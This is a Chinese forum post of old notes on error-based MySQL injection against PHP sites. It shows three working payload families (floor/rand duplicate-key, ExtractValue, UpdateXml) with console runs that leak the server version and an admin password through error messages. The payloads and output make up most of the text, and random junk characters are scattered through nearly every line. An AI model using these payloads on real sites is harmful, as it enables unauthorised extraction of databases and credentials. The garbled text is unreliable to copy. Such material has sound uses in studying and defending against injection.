放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
% @$ ~6 e& o: h% v$ |实际测试环境:
" x6 U& t& B+ L$ V& |
L- x" J" q+ V9 ^! p* |
9 u( ^, A% a+ {( Y: C! xmysql> show tables;
! e9 K$ ~4 y" w+----------------+/ k2 H, q$ w- q$ F0 j8 [/ G3 g; t. B
| Tables_in_test |
( L C9 g3 e: H- u5 O" `7 H+----------------+( @. Y c% p4 a- u& t
| admin |
8 q5 c% H, E2 z$ |+ y( a| article |7 `/ w0 W, Q1 m8 m2 h
+----------------+2 G" u' @8 Y A9 p4 D
+ z9 p- V! H+ P1 o0 o
# s8 j- J+ J$ \# K, y- P
# N- H/ i6 B T+ z, ^; Z* ?- Hmysql> describe admin;; Q3 D8 v# Z7 w$ e5 C+ _, l
+-------+------------------+------+-----+---------+----------------+8 K9 r' L* S) n8 i
| Field | Type | Null | Key | Default | Extra |2 N2 \; C% \' O0 e. p
+-------+------------------+------+-----+---------+----------------+) h8 s0 d9 u$ z% m
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |7 }/ U$ P& G" I& }% `
| user | varchar(50) | NO | | NULL | |* ^* Z n5 N1 V8 h$ }! h+ `
| pass | varchar(50) | NO | | NULL | |& q9 C$ E& q; y! w" E# \& M
+-------+------------------+------+-----+---------+----------------+% l+ S/ p$ T+ t# C& X
4 o* O4 w) O) e2 _
. D, I; t8 t+ I, x* L+ U, q3 W0 c
8 U4 ?+ x8 O2 d2 `3 }4 Xmysql> describe article;
7 D7 g! f5 n R4 G$ X1 \( S0 B+---------+------------------+------+-----+---------+----------------+
. [7 Q1 K( x) d1 L| Field | Type | Null | Key | Default | Extra | {* r* H4 A$ V$ g6 a5 n
+---------+------------------+------+-----+---------+----------------+
3 h! t4 n" {, }/ ^, ]+ y9 ], c| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
( _+ S) N, s# v1 a: x| title | varchar(50) | NO | | NULL | |: ?/ J7 z! a! S2 ]
| content | varchar(50) | NO | | NULL | |
8 P$ q5 P6 [: v% o" p* t) K+---------+------------------+------+-----+---------+----------------+
( }$ ~! L: W- o' n1、通过floor报错 h* M" M5 `/ T! `5 T
可以通过如下一些利用代码
- Z# {, }# O6 H
& L& A; F# Y: W% o) ? , h: w: h5 H; v* C1 s# ?& C3 Q
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
' E/ v4 I) t8 z0 `! `from information_schema.tables group by x)a);/ K( p7 R7 e' }8 Z3 g
* n: ]2 v! {, v" `# `
4 {3 n4 Y/ S7 @* M0 x! G$ x/ m! iand (select count(*) from (select 1 union select null union select !1)x8 O; s2 g6 s4 u
group by concat((select table_name from information_schema.tables limit 1),$ ]5 S: x& F: t
floor(rand(0)*2)));) \" V! q2 r. |* T6 j
举例如下:: w$ q4 X& u" \) t9 z
首先进行正常查询:6 O- y% q( d Z* G! ~
$ v6 N* y2 K% S* a0 s- ]( xmysql> select * from article where id = 1;' F. { U2 z5 [. @+ z: H F6 h
+----+-------+---------+9 H( h R8 r$ U2 `6 L
| id | title | content |
: K3 X" m b% a+ @! `+----+-------+---------+
5 M/ g" L% z6 E( b5 c. w y| 1 | test | do it |% N+ I' I. O; |; r7 j6 X I$ n
+----+-------+---------+' d0 z1 @+ \ g( m* Q
假如id输入存在注入的话,可以通过如下语句进行报错。
9 l( v1 g8 y w5 O2 x
1 V; s' D. q9 a7 l
, ], V ~" U4 x' @& r( Nmysql> select * from article where id = 1 and (select 1 from" @# m" U0 _+ x; M5 r5 C
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);6 U7 `9 P8 N1 x" @2 S4 i4 z
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
, Z" M. f1 T8 D1 n/ n% o/ c) N可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。/ n) b- B: F% R: w6 `) O3 x! z2 z; i
例如我们需要查询管理员用户名和密码:0 [3 B$ ~# V) L
Method1:
2 K& `$ m% z/ f3 U0 D & t: X3 s% B. x0 d9 m* g
$ i4 U k* M* tmysql> select * from article where id = 1 and (select 1 from
% y7 {" ]2 o3 @, L c(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x; S, G: X" {3 D1 H/ x A$ j* C
from information_schema.tables group by x)a);! _1 V J6 Z5 F4 c8 t& O
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'% l/ K) ?, M4 E' A
Method2:
% d7 k( `& I% r" v- p1 {2 u; R' S/ _5 V 9 r" R9 I6 H+ a' m# v( f
) C/ a7 v( J/ n! v8 y/ S: G& W) x
mysql> select * from article where id = 1 and (select count(*)# n) C$ s: ~! h' Q1 R+ F
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),1 B/ P7 Z( [" {
floor(rand(0)*2)));" v7 M0 X6 N u3 Z8 f
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
0 J3 n, C5 Q5 M/ J: K2、ExtractValue j! b& x8 \& I4 Y6 }& g$ d+ f
测试语句如下! }: y& [9 k- l6 Q9 u
* i8 N8 {1 P e# n& @( f9 e
) r; l/ d2 l1 u( J+ Qand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));1 ?% U/ m5 D/ ?0 k- ?6 _5 d5 t6 C0 \
实际测试过程% ^( J, J# W3 }8 r3 d5 U
* n: i! d+ @* y/ W+ W
( O8 ~. a* t F) x2 D' v% j5 `mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,6 }0 O" i1 s8 P1 u# Q
(select pass from admin limit 1)));--+ E1 B# }8 K% { r
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
' Z, j. Q- H& ` |8 H/ h3、UpdateXml
- s7 S' ~, b- S- c4 ]测试语句. g# C4 h& d4 L( U# z
g1 E' Q+ c$ P" w
7 T- V4 j/ ?: Q9 q1 H F- dand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))) {) g" h; }/ I L9 V7 {
实际测试过程
: G s$ `- H, ~( O, \ O 8 _5 v# X" z1 O n- r/ ?
: I6 a" u+ o, W# i1 I6 F+ Emysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
$ H9 o: p `5 ?- ~6 m(select pass from admin limit 1),0x5e24),1));
& i& Q. F9 O% nERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
P4 _' I5 d- R) a! W# n/ ~$ R2 pAll, thanks foreign guys.
( u# M- E- Q* s0 ]
3 ?) b# z. t t) P9 ^& N2 v# I( m' k- o" H8 Q
|
发表于 2012-12-10 10:28:51
收藏
支持
反对